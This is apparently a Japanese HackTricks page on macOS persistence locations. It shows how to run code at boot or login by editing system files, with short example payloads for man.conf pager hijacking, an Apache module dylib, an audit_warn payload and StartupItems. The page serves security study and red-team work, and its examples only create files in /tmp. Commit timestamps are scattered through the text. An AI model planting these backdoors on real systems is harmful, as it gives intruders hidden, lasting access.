-rw-r--r-- 1 root wheel 891 May 13 00:29 /System/Library/LaunchDaemons/com.apple.periodic-weekly.plist
# The scripts located in their locations
ls -lR /etc/periodic
total 0
drwxr-xr-x 11 root wheel 352 May 13 00:29 daily
drwxr-xr-x 5 root wheel 160 May 13 00:29 monthly
drwxr-xr-x 3 root wheel 96 May 13 00:29 weekly
/etc/periodic/daily:
total 72
-rwxr-xr-x 1 root wheel 1642 May 13 00:29 110.clean-tmps
-rwxr-xr-x 1 root wheel 695 May 13 00:29 130.clean-msgs
[...]
/etc/periodic/monthly:
total 24
-rwxr-xr-x 1 root wheel 888 May 13 00:29 199.rotate-fax
-rwxr-xr-x 1 root wheel 1010 May 13 00:29 200.accounting
-rwxr-xr-x 1 root wheel 606 May 13 00:29 999.local
/etc/periodic/weekly:
total 8
-rwxr-xr-x 1 root wheel 620 May 13 00:29 999.local
2023-09-28 20:14:46 +00:00
```
{% endcode %}
2023-09-28 20:26:51 +00:00
他にも、実行される定期的なスクリプトがあります。これは ** `/etc/defaults/periodic.conf` ** に示されています。
2023-09-28 20:14:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
grep "Local scripts" /etc/defaults/periodic.conf
daily_local="/etc/daily.local" # Local scripts
weekly_local="/etc/weekly.local" # Local scripts
monthly_local="/etc/monthly.local" # Local scripts
2023-09-28 20:14:46 +00:00
```
2023-09-28 23:15:43 +00:00
もし、`/etc/daily.local`、`/etc/weekly.local`、または`/etc/monthly.local`のいずれかのファイルを書き込むことができれば、**遅かれ早かれ実行**されます。
2023-09-28 20:26:51 +00:00
### PAM
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
解説: [Linux Hacktricks PAM ](../linux-hardening/linux-post-exploitation/pam-pluggable-authentication-modules.md )\
解説: [https://theevilbit.github.io/beyond/beyond\_0005/ ](https://theevilbit.github.io/beyond/beyond\_0005/ )
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [🟠 ](https://emojipedia.org/large-orange-circle )
* ただし、root権限が必要です
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* 常にroot権限が必要です
2023-09-28 20:14:46 +00:00
#### 説明と攻撃手法
2023-09-28 23:15:43 +00:00
PAMはmacOS内での簡単な実行よりも**持続性**とマルウェアに焦点を当てているため、このブログでは詳細な説明は行いません。このテクニックをよりよく理解するためには、解説を読んでください。
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
### 認証プラグイン
2023-09-28 20:14:46 +00:00
2023-09-28 23:15:43 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0028/ ](https://theevilbit.github.io/beyond/beyond\_0028/ )\
解説: [https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65 ](https://posts.specterops.io/persistent-credential-theft-with-authorization-plugins-d17b34719d65 )
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 23:15:43 +00:00
* ただし、root権限が必要で追加の設定が必要です
2023-09-28 20:14:46 +00:00
#### 場所
2023-09-28 20:26:51 +00:00
* `/Library/Security/SecurityAgentPlugins/`
* root権限が必要です
* 認証データベースをプラグインを使用するように設定する必要もあります
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明と攻撃手法
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
ユーザーがログインする際に実行される認証プラグインを作成して持続性を維持することができます。これらのプラグインの作成方法の詳細については、以前の解説を参照してください( )
2023-09-28 20:14:46 +00:00
### Man.conf
2023-09-28 23:15:43 +00:00
解説: [https://theevilbit.github.io/beyond/beyond\_0030/ ](https://theevilbit.github.io/beyond/beyond\_0030/ )
2023-09-26 23:45:10 +00:00
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [🟠 ](https://emojipedia.org/large-orange-circle )
2023-09-28 23:15:43 +00:00
* ただし、root権限が必要でユーザーはmanを使用する必要があります
2023-09-28 20:26:51 +00:00
#### 場所
2023-09-26 23:45:10 +00:00
2023-09-28 20:14:46 +00:00
* **`/private/etc/man.conf`**
2023-09-28 20:26:51 +00:00
* root権限が必要です
2023-09-28 20:14:46 +00:00
* **`/private/etc/man.conf`**: manが使用されるたびに
2023-09-26 23:45:10 +00:00
2023-09-28 20:14:46 +00:00
#### 説明と攻撃手法
2023-10-01 18:13:43 +00:00
設定ファイル**`/private/etc/man.conf`**は、manドキュメントファイルを開く際に使用するバイナリ/スクリプトを示しています。したがって、実行可能ファイルのパスを変更することで、ユーザーがmanを使用してドキュメントを読むたびにバックドアが実行されます。
2023-09-28 20:14:46 +00:00
2023-10-01 18:13:43 +00:00
例えば、**`/private/etc/man.conf`**に以下を設定します:
2023-09-28 20:14:46 +00:00
```
MANPAGER /tmp/view
```
2023-10-01 18:13:43 +00:00
次に、`/tmp/view`を以下のように作成します:
2023-09-28 20:14:46 +00:00
```bash
#!/bin/zsh
2023-06-01 21:09:46 +00:00
2023-09-28 20:14:46 +00:00
touch /tmp/manconf
/usr/bin/less -s
```
2023-09-28 20:26:51 +00:00
### Apache2
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
**解説**: [https://theevilbit.github.io/beyond/beyond\_0023/ ](https://theevilbit.github.io/beyond/beyond\_0023/ )
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* サンドボックスをバイパスするのに便利: [🟠 ](https://emojipedia.org/large-orange-circle )
* ただし、rootである必要があり、apacheが実行中である必要があります
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
#### 場所
2023-09-26 23:45:10 +00:00
2023-09-28 20:26:51 +00:00
* **`/etc/apache2/httpd.conf`**
* root権限が必要
* トリガー: Apache2が起動したとき
#### 説明とエクスプロイト
/etc/apache2/httpd.confにモジュールを読み込むように指示するために、次のような行を追加することができます:
{% code overflow="wrap" %}
2023-09-26 23:45:10 +00:00
```bash
2023-09-28 20:26:51 +00:00
LoadModule my_custom_module /Users/Shared/example.dylib "My Signature Authority"
2023-09-26 23:45:10 +00:00
```
2023-09-28 20:26:51 +00:00
{% endcode %}
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
この方法で、コンパイルされたモジュールはApacheによって読み込まれます。ただし、有効なApple証明書で署名するか、システムに新しい信頼できる証明書を追加してそれで署名する必要があります。
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
その後、サーバーが起動することを確認するために必要な場合は、次のコマンドを実行できます。
2023-09-28 20:14:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
sudo launchctl load -w /System/Library/LaunchDaemons/org.apache.httpd.plist
```
Dylbのコード例:
```objectivec
#include <stdio.h>
#include <syslog.h>
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
__attribute__((constructor))
static void myconstructor(int argc, const char **argv)
{
printf("[+] dylib constructor called from %s\n", argv[0]);
syslog(LOG_ERR, "[+] dylib constructor called from %s\n", argv[0]);
}
2023-09-28 20:14:46 +00:00
```
2023-09-28 20:26:51 +00:00
### BSM監査フレームワーク
解説: [https://theevilbit.github.io/beyond/beyond\_0031/ ](https://theevilbit.github.io/beyond/beyond\_0031/ )
* サンドボックスをバイパスするのに役立つ: [🟠 ](https://emojipedia.org/large-orange-circle )
* ただし、ルート権限が必要で、auditdが実行されている必要があり、警告を引き起こす必要があります
#### 場所
2023-09-28 20:14:46 +00:00
2023-09-28 20:26:51 +00:00
* **`/etc/security/audit_warn`**
* ルート権限が必要です
* **トリガー**: auditdが警告を検出した場合
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
#### 説明とエクスプロイト
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
auditdが警告を検出すると、スクリプト**`/etc/security/audit_warn`**が**実行**されます。したがって、ペイロードを追加することができます。
2023-06-01 21:09:46 +00:00
```bash
2023-09-28 20:26:51 +00:00
echo "touch /tmp/auditd_warn" >> /etc/security/audit_warn
2023-06-01 21:09:46 +00:00
```
2023-09-28 20:26:51 +00:00
`sudo audit -n` を使用して警告を強制することができます。
2023-06-01 21:09:46 +00:00
2023-07-07 23:42:27 +00:00
### スタートアップアイテム
2023-06-01 21:09:46 +00:00
2023-09-26 23:45:10 +00:00
{% hint style="danger" %}
2023-09-28 20:26:51 +00:00
**これは非推奨ですので、以下のディレクトリには何も見つかりません。**
2023-09-26 23:45:10 +00:00
{% endhint %}
2023-06-01 21:09:46 +00:00
2023-07-07 23:42:27 +00:00
**StartupItem**は、次の2つのフォルダのいずれかに**配置**される**ディレクトリ**です。`/Library/StartupItems/`または`/System/Library/StartupItems/`
2023-06-01 21:09:46 +00:00
2023-09-28 20:26:51 +00:00
これらの2つの場所のいずれかに新しいディレクトリを配置した後、そのディレクトリ内に**2つのアイテム**をさらに配置する必要があります。これらの2つのアイテムは、**rcスクリプト**といくつかの設定を保持する**plist**です。このplistは「**StartupParameters.plist**」と呼ばれる必要があります。
2023-06-01 21:09:46 +00:00
{% tabs %}
{% tab title="StartupParameters.plist" %}
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
< plist version = "1.0" >
< dict >
2023-07-07 23:42:27 +00:00
< key > Description< / key >
< string > This is a description of this service< / string >
< key > OrderPreference< / key >
< string > None< / string > <!-- Other req services to execute before this -->
< key > Provides< / key >
< array >
< string > superservicename< / string > <!-- Name of the services provided by this file -->
< / array >
2023-06-01 21:09:46 +00:00
< / dict >
< / plist >
```
2023-07-07 23:42:27 +00:00
{% tab title="superservicename" %}スーパーサービス名
2023-06-01 21:09:46 +00:00
```bash
#!/bin/sh
. /etc/rc.common
StartService(){
2023-07-07 23:42:27 +00:00
touch /tmp/superservicestarted
2023-06-01 21:09:46 +00:00
}
StopService(){
2023-07-07 23:42:27 +00:00
rm /tmp/superservicestarted
2023-06-01 21:09:46 +00:00
}
RestartService(){
2023-07-07 23:42:27 +00:00
echo "Restarting"
2023-06-01 21:09:46 +00:00
}
RunService "$1"
```
{% endtab %}
{% endtabs %}
2023-09-28 20:26:51 +00:00
### emond
{% hint style="danger" %}
私のmacOSにはこのコンポーネントが見つかりませんので、詳細についてはwriteupを確認してください。
{% endhint %}
Writeup: [https://theevilbit.github.io/beyond/beyond\_0023/ ](https://theevilbit.github.io/beyond/beyond\_0023/ )
Appleは**emond**というログ記録メカニズムを導入しました。これは完全に開発されなかったようで、Appleは他のメカニズムのために開発を**放棄**した可能性がありますが、それは**利用可能**なままです。
2023-10-01 18:13:43 +00:00
このあまり知られていないサービスは、Macの管理者にはあまり役に立たないかもしれませんが、脅威の存在する者にとっては、macOSの管理者がおそらく調べることを知らない**永続化メカニズム**として使用する非常に良い理由となるでしょう。 emondの悪用を検出することは難しくありません。なぜなら、サービスのSystem LaunchDaemonはスクリプトを実行する場所を1つだけ探し求めるからです。
2023-09-28 20:26:51 +00:00
```bash
ls -l /private/var/db/emondClients
```
### ~~XQuartz~~
Writeup: [https://theevilbit.github.io/beyond/beyond\_0018/ ](https://theevilbit.github.io/beyond/beyond\_0018/ )
#### 場所
* **`/opt/X11/etc/X11/xinit/privileged_startx.d`**
* ルート権限が必要
* **トリガー**: XQuartzを使用する場合
#### 説明とエクスプロイト
XQuartzは**もはやmacOSにインストールされていない**ため、詳細についてはwriteupを確認してください。
### ~~kext~~
{% hint style="danger" %}
2023-09-28 23:15:43 +00:00
ルートとしてさえkextをインストールするのは非常に複雑なので、サンドボックスからの脱出や持続性のためには考慮しないでください( )
2023-09-28 20:26:51 +00:00
{% endhint %}
#### 場所
2023-09-28 23:15:43 +00:00
KEXTをスタートアップアイテムとしてインストールするには、次のいずれかの場所に**インストールする必要があります**:
2023-09-28 20:26:51 +00:00
* `/System/Library/Extensions`
2023-09-28 23:15:43 +00:00
* OS Xオペレーティングシステムに組み込まれたKEXTファイル。
2023-09-28 20:26:51 +00:00
* `/Library/Extensions`
* サードパーティのソフトウェアによってインストールされたKEXTファイル
現在ロードされているkextファイルをリストアップするには、次のコマンドを使用します:
```bash
kextstat #List loaded kext
kextload /path/to/kext.kext #Load a new one based on path
kextload -b com.apple.driver.ExampleBundle #Load a new one based on path
kextunload /path/to/kext.kext
kextunload -b com.apple.driver.ExampleBundle
```
詳細については、[**カーネル拡張に関するこのセクション**](macos-security-and-privilege-escalation/mac-os-architecture#i-o-kit-drivers)を参照してください。
### ~~amstoold~~
解説: [https://theevilbit.github.io/beyond/beyond\_0029/ ](https://theevilbit.github.io/beyond/beyond\_0029/ )
#### 場所
* **`/usr/local/bin/amstoold`**
* ルート権限が必要です
#### 説明と攻撃手法
おそらく、`/System/Library/LaunchAgents/com.apple.amstoold.plist`の`plist`がこのバイナリを使用していましたが、バイナリ自体は存在しなかったため、そこに何かを配置することができ、XPCサービスが呼び出されるときにバイナリが呼び出されます。
私のmacOSではこれを見つけることができません。
### ~~xsanctl~~
解説: [https://theevilbit.github.io/beyond/beyond\_0015/ ](https://theevilbit.github.io/beyond/beyond\_0015/ )
#### 場所
* **`/Library/Preferences/Xsan/.xsanrc`**
* ルート権限が必要です
* **トリガー**: サービスが実行されるとき(まれ)
#### 説明と攻撃手法
このスクリプトを実行することはあまり一般的ではないようで、私のmacOSでも見つけることができませんでしたので、詳細については解説をご覧ください。
### ~~/etc/rc.common~~
2023-06-01 21:09:46 +00:00
{% hint style="danger" %}
2023-07-07 23:42:27 +00:00
**これは最新のMacOSバージョンでは機能しません**
2023-06-01 21:09:46 +00:00
{% endhint %}
2023-09-28 20:26:51 +00:00
ここには、**起動時に実行されるコマンドを配置することもできます。** 通常のrc.commonスクリプトの例:
2023-06-01 21:09:46 +00:00
```bash
#
# Common setup for startup scripts.
#
# Copyright 1998-2002 Apple Computer, Inc.
#
######################
# Configure the shell #
######################
#
# Be strict
#
#set -e
set -u
#
# Set command search path
#
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/libexec:/System/Library/CoreServices; export PATH
#
# Set the terminal mode
#
#if [ -x /usr/bin/tset ] && [ -f /usr/share/misc/termcap ]; then
# TERM=$(tset - -Q); export TERM
#fi
###################
# Useful functions #
###################
#
# Determine if the network is up by looking for any non-loopback
# internet network interfaces.
#
CheckForNetwork()
{
2023-07-07 23:42:27 +00:00
local test
if [ -z "${NETWORKUP:=}" ]; then
test=$(ifconfig -a inet 2>/dev/null | sed -n -e '/127.0.0.1/d' -e '/0.0.0.0/d' -e '/inet/p' | wc -l)
if [ "${test}" -gt 0 ]; then
NETWORKUP="-YES-"
else
NETWORKUP="-NO-"
fi
fi
2023-06-01 21:09:46 +00:00
}
alias ConsoleMessage=echo
#
# Process management
#
GetPID ()
{
2023-07-07 23:42:27 +00:00
local program="$1"
local pidfile="${PIDFILE:=/var/run/${program}.pid}"
local pid=""
if [ -f "${pidfile}" ]; then
pid=$(head -1 "${pidfile}")
if ! kill -0 "${pid}" 2> /dev/null; then
echo "Bad pid file $pidfile; deleting."
pid=""
rm -f "${pidfile}"
fi
fi
if [ -n "${pid}" ]; then
echo "${pid}"
return 0
else
return 1
fi
2023-06-01 21:09:46 +00:00
}
#
# Generic action handler
#
RunService ()
{
2023-07-07 23:42:27 +00:00
case $1 in
start ) StartService ;;
stop ) StopService ;;
restart) RestartService ;;
* ) echo "$0: unknown argument: $1";;
esac
2023-06-01 21:09:46 +00:00
}
```
2023-09-28 20:26:51 +00:00
## 持続性の技術とツール
2023-06-01 21:09:46 +00:00
* [https://github.com/cedowens/Persistent-Swift ](https://github.com/cedowens/Persistent-Swift )
* [https://github.com/D00MFist/PersistentJXA ](https://github.com/D00MFist/PersistentJXA )
< details >
< summary > < a href = "https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology" > < strong > ☁️ HackTricks Cloud ☁️< / strong > < / a > -< a href = "https://twitter.com/hacktricks_live" > < strong > 🐦 Twitter 🐦< / strong > < / a > - < a href = "https://www.twitch.tv/hacktricks_live/schedule" > < strong > 🎙️ Twitch 🎙️< / strong > < / a > - < a href = "https://www.youtube.com/@hacktricks_LIVE" > < strong > 🎥 Youtube 🎥< / strong > < / a > < / summary >
2023-07-07 23:42:27 +00:00
* **サイバーセキュリティ企業で働いていますか?** **HackTricksで会社を宣伝**したいですか?または、**PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロード**したいですか?[**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop)をチェックしてください!
2023-09-28 20:26:51 +00:00
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )を見つけてください。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。
2023-07-07 23:42:27 +00:00
* [**公式のPEASS& ](https://peass.creator-spring.com )を手に入れましょう。
* [**💬** ](https://emojipedia.org/speech-balloon/ ) [**Discordグループ** ](https://discord.gg/hRep4RUj7f )または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロー**してください[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* **ハッキングのトリックを共有するには、PRを** [**hacktricks repo** ](https://github.com/carlospolop/hacktricks ) **と** [**hacktricks-cloud repo** ](https://github.com/carlospolop/hacktricks-cloud ) **に提出してください。**
2023-06-01 21:09:46 +00:00
< / details >
